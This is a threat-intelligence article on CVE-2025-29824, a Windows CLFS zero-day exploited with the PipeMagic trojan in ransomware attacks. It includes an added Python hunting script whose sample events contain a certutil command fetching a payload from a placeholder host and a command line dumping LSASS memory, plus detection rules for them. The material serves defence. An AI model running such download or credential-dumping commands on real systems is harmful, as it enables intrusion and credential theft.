PipeMagic Malware
Researchers have uncovered a now-patched security vulnerability within the Windows Common Log File System (CLFS) that was actively exploited as a zero-day attack. This flaw was used in ransomware campaigns targeting specific organizations across multiple industries, including IT and real estate sectors in the United States, financial institutions in Venezuela, a Spanish software company and retail businesses in Saudi Arabia.
Understanding CVE-2025-29824
Identified as CVE-2025-29824, this vulnerability is a privilege escalation flaw in CLFS that allows attackers to obtain SYSTEM-level privileges. Microsoft addressed and patched the issue during the April 2025 Patch Tuesday update. The cybercriminal group behind these attacks, tracked under the name Storm-2460, deployed a malware strain called PipeMagic to exploit the security vulnerability and deploy ransomware payloads.
How the Attack Unfolded
While the exact method of initial access remains unknown, researchers observed that the attackers used the certutil utility to download malware from a compromised third-party website. The malware, a malicious MSBuild file, contained an encrypted payload that, once executed, launched PipeMagic. This plugin-based Trojan, which has been active since 2022, played a central role in facilitating the attack.
This is not the first instance of PipeMagic being used in zero-day exploits. Previously, it abused CVE-2025-24983, a Windows Win32 Kernel Subsystem privilege escalation flaw. It has also been associated with Nokoyawa ransomware attacks that exploited another CLFS zero-day vulnerability, CVE-2023-28252. Additionally, cybersecurity experts reported that in earlier attacks attributed to the same threat actor, PipeMagic was deployed through an MSBuild script before exploiting the CLFS elevation-of-privilege vulnerability.
Exploitation and Its Impact
The attack specifically targets a vulnerability in the CLFS kernel driver. By exploiting memory corruption and using the RtlSetAllBits API, the attackers overwrite the exploit process’s token with the value 0xFFFFFFFF, granting it full privileges. This allows them to inject into SYSTEM processes, effectively taking control of the infected machine. Following successful exploitation, the threat actors extract user credentials by dumping LSASS memory and encrypt system files with a randomly generated extension. A ransom note containing a TOR domain linked to the RansomEXX ransomware family is then dropped.
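The chain described above (certutil fetching the MSBuild file, MSBuild launching the payload, LSASS being dumped after privilege escalation) leaves process-creation telemetry a defender can hunt on. The following is an added example, not code from the original report or from any vendor: a small triage routine run over constructed Sysmon-style process-creation events. The staging paths, the example hostname and the dumper name are assumptions chosen only to exercise the rules.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 style fields), NOT real
# telemetry from the campaign; they only model the behaviours the report names.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://example.invalid/stage1.txt C:\Users\Public\a.txt",
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "cmdline": r"MSBuild.exe C:\Users\Public\build.proj",   # assumed staging path
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe readme.txt",
     "parent": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Users\Public\tool.exe",                    # hypothetical dumper
     "cmdline": r"tool.exe lsass.exe C:\Users\Public\out.dmp",
     "parent": r"C:\Windows\System32\cmd.exe"},
]

# Directories a low-privileged user can write to (assumption: tune per environment).
USER_WRITABLE = re.compile(r"\\(Users\\Public|ProgramData|Temp|AppData\\Local\\Temp)\\", re.I)


def classify(event):
    """Return the names of the hunting rules this event triggers (empty list = no hit)."""
    image = event["image"].lower()
    cmd = event["cmdline"].lower()
    hits = []
    # Rule 1: certutil acting as a downloader (the report: certutil fetched the MSBuild file).
    if image.endswith("\\certutil.exe") and "urlcache" in cmd and "http" in cmd:
        hits.append("certutil_download")
    # Rule 2: MSBuild handed a project file from a user-writable directory.
    if image.endswith("\\msbuild.exe") and USER_WRITABLE.search(event["cmdline"]):
        hits.append("msbuild_user_writable_project")
    # Rule 3: a binary outside C:\Windows naming lsass on its command line (credential dumping).
    if "lsass" in cmd and not image.startswith("c:\\windows\\"):
        hits.append("lsass_reference")
    return hits


def triage(events):
    """Keep only events with at least one hit, as (process name, rules) pairs."""
    return [(e["image"].rsplit("\\", 1)[-1], classify(e)) for e in events if classify(e)]


if __name__ == "__main__":
    for name, rules in triage(SAMPLE_EVENTS):
        print(f"{name}: {', '.join(rules)}")
```

Seen together on one host within a short window, these three hits reproduce the sequence the report describes; any single one is only a lead to investigate.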
Security Measures and Defense
Despite the severity of the attack, Windows 11, version 24H2, is not affected by this specific exploitation. This is due to security restrictions placed on particular System Information Classes within NtQuerySystemInformation, which limit access to users holding SeDebugPrivilege, a permission typically granted only to administrative users.
Ransomware actors continue to prioritize post-compromise privilege escalation, as it enables them to transform initial access into broader control within a network. By leveraging exploits like CVE-2025-29824, they can escalate their reach, gain privileged access, and deploy ransomware with devastating impact. Organizations must remain vigilant, applying security patches promptly, monitoring for unusual system activity, and enforcing strong access controls to lessen the risks posed by such evolving cyber threats.